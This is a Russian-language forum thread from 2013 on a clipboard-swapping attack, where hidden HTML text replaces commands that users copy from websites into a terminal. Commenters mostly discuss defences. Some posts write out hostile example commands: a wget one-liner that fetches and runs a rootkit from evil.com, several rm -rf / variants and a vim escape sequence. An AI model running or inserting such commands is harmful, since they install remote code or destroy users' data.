|
Вариант для распечатки |
Пред. тема | След. тема | ||
Форум Разговоры, обсуждение новостей | |||
---|---|---|---|
Изначальное сообщение | [ Отслеживать ] |
"Концепция атаки по подмене копируемого в терминал текста с с..." | +1 +/– | |
Сообщение от opennews (??) on 08-Апр-13, 10:12 | ||
Опубликована (http://thejh.net/misc/website-terminal-copy-paste) интересная концепция тривиальной, но эффективной, атаки, рассчитанной на излишнее доверие к увиденных при копировании в терминал примеров команд с различных сайтов. Используя невидимый, но помещаемый в буфер обмена при копировании, блок "span", можно вместо невинного текста, организовать выполнение в терминале произвольных команд. | ||
Ответить | Правка | Cообщить модератору |
Оглавление |
Сообщения по теме | [Сортировка по времени | RSS] |
1. "Концепция атаки по подмене копируемого в терминал текста с с..." | +4 +/– | |
Сообщение от zzzzz (??) on 08-Апр-13, 10:12 | ||
вот это дырень О_О | ||
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору |
10. "Концепция атаки по подмене копируемого в терминал текста с с..." | –1 +/– | |
Сообщение от Аноним (??) on 08-Апр-13, 11:02 | ||
http://images.wikia.com/callofduty/ru/images/6/69/%D0... | ||
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору |
26. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Аноним (??) on 08-Апр-13, 14:03 | ||
Не беда! Теперь вместо | ||
Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору |
36. "Концепция атаки по подмене копируемого в терминал текста с с..." | +2 +/– | |
Сообщение от pavlinux (ok) on 08-Апр-13, 15:06 | ||
Похожий "эксплойт" был на заре WWW, когда народ понял, что можно писать текст цветом бэкграунда. :) | ||
Ответить | Правка | ^ к родителю #26 | Наверх | Cообщить модератору |
51. "Концепция атаки по подмене копируемого в терминал текста с с..." | +1 +/– | |
Сообщение от 80е on 08-Апр-13, 20:41 | ||
> Похожий "эксплойт" был на заре WWW, когда народ понял, что можно писать | ||
Ответить | Правка | ^ к родителю #36 | Наверх | Cообщить модератору |
65. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от pavlinux (ok) on 09-Апр-13, 05:25 | ||
> я отродясь копирую текст сначала в самый тупой из редакторов, | ||
Ответить | Правка | ^ к родителю #51 | Наверх | Cообщить модератору |
2. "Концепция атаки по подмене копируемого в терминал текста с с..." | +1 +/– | |
Сообщение от Аноним (??) on 08-Апр-13, 10:15 | ||
Это скорее недоработка, чем дырень. | ||
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору |
49. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от 80е on 08-Апр-13, 20:37 | ||
>> Это скорее недоработка, чем дырень. | ||
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору |
3. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Okarin (ok) on 08-Апр-13, 10:24 | ||
Да это просто 10 из 10! Ждем эпидемию вандализма в вики дистрибутивов! | ||
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору |
60. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от MrClon on 09-Апр-13, 00:40 | ||
> Да это просто 10 из 10! Ждем эпидемию вандализма в вики дистрибутивов! | ||
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору |
4. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Аноним (??) on 08-Апр-13, 10:27 | ||
спасибо за идею :) | ||
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору |
5. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Аноним (??) on 08-Апр-13, 10:33 | ||
шикарно же, как это еще раньше не нашли? | ||
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору |
50. "Концепция атаки по подмене копируемого в терминал текста с с..." | –1 +/– | |
Сообщение от 80е on 08-Апр-13, 20:38 | ||
> шикарно же, как это еще раньше не нашли? | ||
Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору |
6. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Аноним (??) on 08-Апр-13, 10:40 | ||
Видимо, следующее первое апреля будет на редкость удачным. :) | ||
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору |
11. "Концепция атаки по подмене копируемого в терминал текста с с..." | –1 +/– | |
Сообщение от Аноним (??) on 08-Апр-13, 11:03 | ||
А при чем тут HTML5? В указанной конструкции нет ни 1 элемента из HTML5 :) | ||
Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору |
13. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Аноним (??) on 08-Апр-13, 11:18 | ||
Ну, я про HTML5 и не писал. Да и насколько мне известно, среднестатистический shell пока что кроме bash/csh/ksh скриптов ничего другого не разумеет. Хотя, быть может, наступят те светлые времена, когда HTML-теги можно будет набивать прямо в терминале. А вместо bash будет JavaScript. :) | ||
Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору |
15. "Концепция атаки по подмене копируемого в терминал текста с с..." | +1 +/– | |
Сообщение от Аноним (??) on 08-Апр-13, 11:22 | ||
В дополнение: | ||
Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору |
61. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от MrClon on 09-Апр-13, 00:46 | ||
> В дополнение: | ||
Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору |
12. "Концепция атаки по подмене копируемого в терминал текста с с..." | –1 +/– | |
Сообщение от skybon (ok) on 08-Апр-13, 11:17 | ||
Ну много же всяких, которые тянут любое говно в ближайший терминал без оглядки. | ||
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору |
17. "Концепция атаки по подмене копируемого в терминал текста с с..." | +2 +/– | |
Сообщение от Аноним (??) on 08-Апр-13, 11:40 | ||
Ну так копировать сначала в текстовый редактор и смотреть, что вставилось. Лишнее убирать и только затем в терминал. | ||
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору |
21. "Концепция атаки по подмене копируемого в терминал текста с с..." | –1 +/– | |
Сообщение от zzzzz (??) on 08-Апр-13, 13:20 | ||
> Ну так копировать сначала в текстовый редактор и смотреть, что вставилось. Лишнее | ||
Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору |
22. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от GotF (ok) on 08-Апр-13, 13:33 | ||
> единственный способ защиты - встроить во все терминалы проверку при вставке текста на наличие ";" и выдавать пользователю окошко с предупреждением. | ||
Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору |
23. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Аноним (??) on 08-Апр-13, 13:55 | ||
По уму, надо бы просто чтобы невидимый текст никуда не копировался. | ||
Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору |
30. "Концепция атаки по подмене копируемого в терминал текста с с..." | +1 +/– | |
Сообщение от GotF (ok) on 08-Апр-13, 14:20 | ||
> По уму, надо бы просто чтобы невидимый текст никуда не копировался. | ||
Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору |
25. "Концепция атаки по подмене копируемого в терминал текста с с..." | +1 +/– | |
Сообщение от cmp (ok) on 08-Апр-13, 14:03 | ||
echo Hello && setsid sh -c 'wget -b -O /usr/bin http://evil.com/rootkit.sh && chmod 0755 /usr/bin/rootkit.sh && rootkit.sh' > /dev/null 2>&1 & clear && git clone git://kernel.org | ||
Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору |
29. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от GotF (ok) on 08-Апр-13, 14:18 | ||
> echo Hello && setsid sh -c 'wget -b -O /usr/bin http://evil.com/rootkit.sh && | ||
Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору |
38. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от gegMOPO4 (ok) on 08-Апр-13, 16:30 | ||
Ещё \r. | ||
Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору |
18. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Слакварявод on 08-Апр-13, 11:58 | ||
В clipper-е в кедах видно сразу что там в буфер забилось! можно там глядеть, прежде чем вставлять! | ||
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору |
19. "Концепция атаки по подмене копируемого в терминал текста с с..." | +2 +/– | |
Сообщение от 1235235412831 on 08-Апр-13, 12:50 | ||
Патч Брамина v.2.0 :D | ||
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору |
20. "Концепция атаки по подмене копируемого в терминал текста с с..." | +1 +/– | |
Сообщение от GotF (ok) on 08-Апр-13, 12:57 | ||
> Патч Брамина v.2.0 | ||
Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору |
24. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Аноним (??) on 08-Апр-13, 13:58 | ||
Теперь всё в блокнот копировать.. ( | ||
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору |
27. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от нимус on 08-Апр-13, 14:06 | ||
ну вот, спалили тему... | ||
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору |
28. "Концепция атаки по подмене копируемого в терминал текста с с..." | +1 +/– | |
Сообщение от pavlinux (ok) on 08-Апр-13, 14:17 | ||
Ваще-то это дыра в браузерах - то, что копируются не выделенные символы, а хрень какая-то. | ||
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору |
32. "Концепция атаки по подмене копируемого в терминал текста с с..." | +2 +/– | |
Сообщение от Клыкастый (ok) on 08-Апр-13, 14:25 | ||
эта милая привычка браузеров выделять не то, что я вижу, а ещё всякую html разметку мне никогда не нравилась. | ||
Ответить | Правка | ^ к родителю #28 | Наверх | Cообщить модератору |
58. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Михрютка (ok) on 08-Апр-13, 23:46 | ||
> эта милая привычка браузеров выделять не то, что я вижу, а ещё | ||
Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору |
57. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Михрютка (ok) on 08-Апр-13, 23:42 | ||
в CSS | ||
Ответить | Правка | ^ к родителю #28 | Наверх | Cообщить модератору |
31. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Клыкастый (ok) on 08-Апр-13, 14:24 | ||
"вставить как простой текст", энтер жать не сразу, не? | ||
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору |
34. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от angra (ok) on 08-Апр-13, 14:34 | ||
В "простом тексте" уже могут быть переводы строки. Да и вычитывать большой блок вряд ли кто-то станет, особенно после вычитки его в браузере. | ||
Ответить | Правка | ^ к родителю #31 | Наверх | Cообщить модератору |
35. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Клыкастый (ok) on 08-Апр-13, 14:39 | ||
ну тогда - "ой!" | ||
Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору |
52. "Концепция атаки по подмене копируемого в терминал текста с с..." | +1 +/– | |
Сообщение от Stax (ok) on 08-Апр-13, 20:57 | ||
Гм. А вот если там последовательность <esc>:q!rm -rf /<enter> ? А вы в вим вставляете.. | ||
Ответить | Правка | ^ к родителю #35 | Наверх | Cообщить модератору |
53. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Клыкастый (ok) on 08-Апр-13, 21:45 | ||
> Гм. А вот если там последовательность <esc>:q!rm -rf /<enter> ? А вы в вим вставляете.. | ||
Ответить | Правка | ^ к родителю #52 | Наверх | Cообщить модератору |
37. "Концепция атаки по подмене копируемого в терминал текста с с..." | –6 +/– | |
Сообщение от Аноним (??) on 08-Апр-13, 15:22 | ||
Не понимаю сути проблемы. В гну/линукс такой бардак что написать строчку которая заработает у других людей даже в том же дичтрибутиве очень сложно. | ||
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору |
39. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Аноним (??) on 08-Апр-13, 17:03 | ||
rm -rf /usr | ||
Ответить | Правка | ^ к родителю #37 | Наверх | Cообщить модератору |
41. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Аноним (??) on 08-Апр-13, 17:17 | ||
rm -rf /* && init 6 | ||
Ответить | Правка | ^ к родителю #39 | Наверх | Cообщить модератору |
54. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Xasd (ok) on 08-Апр-13, 22:08 | ||
| ||
Ответить | Правка | ^ к родителю #41 | Наверх | Cообщить модератору |
62. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Аноним (??) on 09-Апр-13, 01:12 | ||
reboot или shutdown -h now | ||
Ответить | Правка | ^ к родителю #54 | Наверх | Cообщить модератору |
63. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Xasd (ok) on 09-Апр-13, 03:15 | ||
$ reboot | ||
Ответить | Правка | ^ к родителю #62 | Наверх | Cообщить модератору |
66. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от pavlinux (ok) on 09-Апр-13, 05:29 | ||
>[оверквотинг удален] | ||
Ответить | Правка | ^ к родителю #63 | Наверх | Cообщить модератору |
40. "Концепция атаки по подмене копируемого в терминал текста с с..." | +1 +/– | |
Сообщение от Онононо on 08-Апр-13, 17:15 | ||
понимаешь друг линукс тут вообще не при чем, эта "уязвимость" будет работать на любой ОС где есть доступ к шелу. | ||
Ответить | Правка | ^ к родителю #37 | Наверх | Cообщить модератору |
42. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Аноним (??) on 08-Апр-13, 18:02 | ||
> понимаешь друг линукс тут вообще не при чем, эта "уязвимость" будет работать | ||
Ответить | Правка | ^ к родителю #40 | Наверх | Cообщить модератору |
43. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Аноним (??) on 08-Апр-13, 18:25 | ||
Для пользователей винды то ли на Баше, то ли ItHappens был описан Формат Улыбки: | ||
Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору |
44. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Онононо on 08-Апр-13, 18:35 | ||
ты окромя винды больше осей не знаешь? | ||
Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору |
46. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Аноним (??) on 08-Апр-13, 19:16 | ||
> Пользователи винды не очень часто знают что такое cmd.exe | ||
Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору |
68. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Аноним (??) on 10-Апр-13, 16:55 | ||
>> Пользователи винды не очень часто знают что такое cmd.exe | ||
Ответить | Правка | ^ к родителю #46 | Наверх | Cообщить модератору |
47. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Aceler (ok) on 08-Апр-13, 19:52 | ||
Когда http://paypal.com/ на самом деле копируется как http://lskdjbsnd.tk/sdefj/sdf/?sdjhasdknb&dfsdf&go=http://pa... при этом по второй ссылке тебе покажут логин пэйпала, а в адресной строке через Javascript будет стоять paypal.com — пользователи венды будут очень недовольны. | ||
Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору |
64. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Xasd (ok) on 09-Апр-13, 03:33 | ||
Firefox can't find the server at www.lskdjbsnd.tk. | ||
Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору |
56. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Харитон on 08-Апр-13, 22:22 | ||
>> понимаешь друг линукс тут вообще не при чем, эта "уязвимость" будет работать | ||
Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору |
45. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Аноним (??) on 08-Апр-13, 19:14 | ||
Я про то почти никогда не имеет смысл что-то копипастить с сайтов. | ||
Ответить | Правка | ^ к родителю #40 | Наверх | Cообщить модератору |
55. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Xasd (ok) on 08-Апр-13, 22:10 | ||
| ||
Ответить | Правка | ^ к родителю #40 | Наверх | Cообщить модератору |
48. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от mmrnmhrm on 08-Апр-13, 20:29 | ||
реквестирую буфер обмена с программируемой логикой | ||
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору |
59. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Михрютка (ok) on 08-Апр-13, 23:50 | ||
постить на опеннете новости с угловыми скобками в тексте - идеальный метод троллинга аудитории. | ||
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору |
67. "Концепция атаки по подмене копируемого в терминал текста с с..." | +/– | |
Сообщение от Аноним (??) on 09-Апр-13, 13:15 | ||
В urxvt есть плагин confirm-paste, требующий подтверждения при вставке многострочного текста. | ||
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору |
Архив | Удалить |
Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема |
Закладки на сайте Проследить за страницей |
Created 1996-2024 by Maxim Chirkov Добавить, Поддержать, Вебмастеру |